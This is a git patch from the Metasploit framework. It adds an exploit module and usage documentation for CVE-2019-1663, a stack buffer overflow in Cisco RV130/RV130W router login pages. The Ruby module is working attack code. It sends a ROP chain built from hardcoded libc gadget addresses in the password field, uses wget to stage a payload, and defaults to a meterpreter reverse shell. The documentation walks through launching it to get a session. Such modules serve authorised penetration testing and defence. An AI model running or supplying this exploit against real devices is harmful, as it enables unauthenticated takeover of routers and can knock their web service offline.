From e53404b478108bed10cc948fcd354d0e3b4bd0d0 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 12 Apr 2019 14:06:51 -0500
Subject: [PATCH] Land #11613, Cisco RV130 stack BOF exploit

---
 .../exploit/linux/http/cisco_rv130_rmi_rce.md |  27 ++++
 .../linux/http/cisco_rv130_rmi_rce.rb         | 149 ++++++++++++++++++
 2 files changed, 176 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
 create mode 100644 modules/exploits/linux/http/cisco_rv130_rmi_rce.rb

diff --git a/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
new file mode 100644
index 0000000000..6ad317ad1a
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
@@ -0,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
+
diff --git a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
new file mode 100644
index 0000000000..c8b0a57353
--- /dev/null
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+          system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang', # Initial discovery
+          'Haoliang Lu', # Initial discovery
+          'T. Shiomitsu', # Initial discovery
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'CmdStagerFlavor' => %w{ wget },
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'CMDSTAGER::FLAVOR' => 'wget',
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0,
+      'Notes' => {
+        'Stability'   => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
+  end
+
+  def p (offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) +       # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) +                        # r2
+      rand_text_alpha(4) +                                # r6
+      p(target['gadget2']) +                              # pc
+      cmd
+    shellcode
+  end
+
+  def send_request (payload)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": "cisco",
+              "pwd": payload,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status('Sending request')
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
+    send_request(shellcode)
+  end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
+end